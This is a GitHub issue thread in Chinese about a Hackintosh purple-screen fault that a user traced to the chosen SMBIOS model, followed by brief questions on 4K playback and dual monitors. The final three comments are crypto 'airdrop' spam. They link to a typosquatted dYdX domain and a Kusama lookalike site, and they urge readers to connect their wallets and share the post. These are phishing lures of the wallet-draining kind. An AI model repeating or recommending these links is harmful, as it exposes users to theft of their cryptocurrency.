### ISSUE TITLE
关于 SMBIOS 的不同会影响紫屏的进一步测试

### ISSUE THREAD

**Issue by lslqtz** [wonpn/Hackintosh_i5-6500_B250M_HD530_EFI#1]
先感谢您提出的 SMBIOS 的不同会影响紫屏让我成功解决了紫屏问题，而在进行进一步的测试后，我已确定如果 SMBIOS 的机型含有独显，而主机并没有独显的话，才会导致出现紫屏的状况，这一问题似乎只在 Big Sur 开始发生。

在我的设备上 (M8H Z170/i3-6100/HD 530)，我使用 DP 输出出现了紫屏问题，我首先从 iMac18,2 换到 Macmini8,1 并成功解决了紫屏问题，随后根据 SMBIOS 对应的硬件配置又从 Macmini8,1 换至 iMac18,1，也没有发生紫屏问题，并且正常通过了 VideoProc 的 H264/HEVC 硬件编解码测试，希望对您有所帮助。

<img width="1920" alt="image" src="https://user-images.githubusercontent.com/18650291/116821066-ecc42680-abaa-11eb-8951-cbb025c73f65.png">

**Comment by wonpn** [comment]
你的是4k 的显示器吗？b站或youtube的4k视频有卡顿现象没？
我的chrome倒是还好勉强能用，firefox 4k基本处于不可用状态，弄了好久也没弄好

**Comment by lslqtz** [comment]
是的，没有卡顿现象

**Comment by qq18436558** [comment]
问一下这个主板如果dp接4K屏，hdmi或dvi可用再接一个屏幕吗，会不会启动黑屏，我看别的人说核显会有这个问题

**Comment by lslqtz** [comment]
> 问一下这个主板如果dp接4K屏，hdmi或dvi可用再接一个屏幕吗，会不会启动黑屏，我看别的人说核显会有这个问题

你问的是作者的主板吗，可以确定的是我的主板没有问题，但是推荐接独显。

**Comment by qq18436558** [comment]
好的谢谢

**Comment by codelou** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
